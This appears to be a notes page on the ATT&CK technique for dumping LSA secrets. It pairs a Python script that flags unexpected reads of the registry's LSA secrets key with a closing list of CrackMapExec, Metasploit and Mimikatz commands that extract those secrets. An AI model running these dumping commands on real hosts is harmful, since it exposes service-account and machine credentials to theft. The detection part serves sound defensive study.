LSA Secrets

https://attack.mitre.org/techniques/T1003/004/

ATT&CK ID: T1003.004

Permissions Required: SYSTEM

Description

Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts. LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets. LSA secrets can also be dumped from memory.
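For detection, reads of the registry location above can be triaged from Windows Security object-access events (4656/4663). The following is an added example, not part of the original page: it assumes auditing is enabled on the key so those events are generated, that events are exported as dictionaries with the `ObjectName` and `ProcessName` fields, and that only `lsass.exe` is expected to touch the key. It does not cover dumping from memory.

```python
# Added example: triage Windows Security object-access events for reads of
# the LSA secrets registry key. All sample events below are constructed.
import ntpath

SECRETS_KEY = r"security\policy\secrets"
HIVE_PREFIXES = ("\\registry\\machine\\", "hkey_local_machine\\", "hklm\\")
OBJECT_ACCESS_EVENTS = {4656, 4663}  # handle requested / object accessed
# Assumption: only LSASS itself is expected to touch this key on the host.
ALLOWED_IMAGES = {r"c:\windows\system32\lsass.exe"}


def normalize_key(object_name):
    """Lower-case the key path and strip the hive prefix, whichever form it uses."""
    name = object_name.strip().lower()
    for prefix in HIVE_PREFIXES:
        if name.startswith(prefix):
            return name[len(prefix):]
    return name


def is_lsa_secrets_key(object_name):
    key = normalize_key(object_name)
    # Match the key itself or any subkey, but not siblings like "...\secretsx".
    return key == SECRETS_KEY or key.startswith(SECRETS_KEY + "\\")


def suspicious_accesses(events):
    """Return events where a non-allowlisted image touched the secrets key."""
    hits = []
    for ev in events:
        if ev.get("EventID") not in OBJECT_ACCESS_EVENTS:
            continue
        if not is_lsa_secrets_key(ev.get("ObjectName", "")):
            continue
        # Compare the full normalized path so a renamed binary is not trusted.
        image = ntpath.normpath(ev.get("ProcessName", "")).lower()
        if image not in ALLOWED_IMAGES:
            hits.append(ev)
    return hits


# Constructed sample events (process names and paths are hypothetical).
SAMPLE_EVENTS = [
    {"EventID": 4663, "ObjectName": r"\REGISTRY\MACHINE\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal", "ProcessName": r"C:\Windows\System32\lsass.exe"},
    {"EventID": 4663, "ObjectName": r"\REGISTRY\MACHINE\SECURITY\Policy\Secrets", "ProcessName": r"C:\Users\Public\collector.exe"},
    {"EventID": 4656, "ObjectName": r"\REGISTRY\MACHINE\SECURITY\Policy\Secrets\$MACHINE.ACC", "ProcessName": r"C:\Users\Public\lsass.exe"},
    {"EventID": 4663, "ObjectName": r"\REGISTRY\MACHINE\SECURITY\Policy\PolAdtEv", "ProcessName": r"C:\Users\Public\collector.exe"},
]
```

Calling `suspicious_accesses(SAMPLE_EVENTS)` returns the second and third events: an unexpected image, and a binary named `lsass.exe` running outside `System32`.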

Techniques

Crackmapexec

crackmapexec smb '10.10.10.100' -u 'moe' -p 'Password123' --lsa

Metasploit

use post/windows/gather/lsa_secrets

Mimikatz

Invoke-Mimikatz -Command '"token::elevate" "lsadump::secrets"'
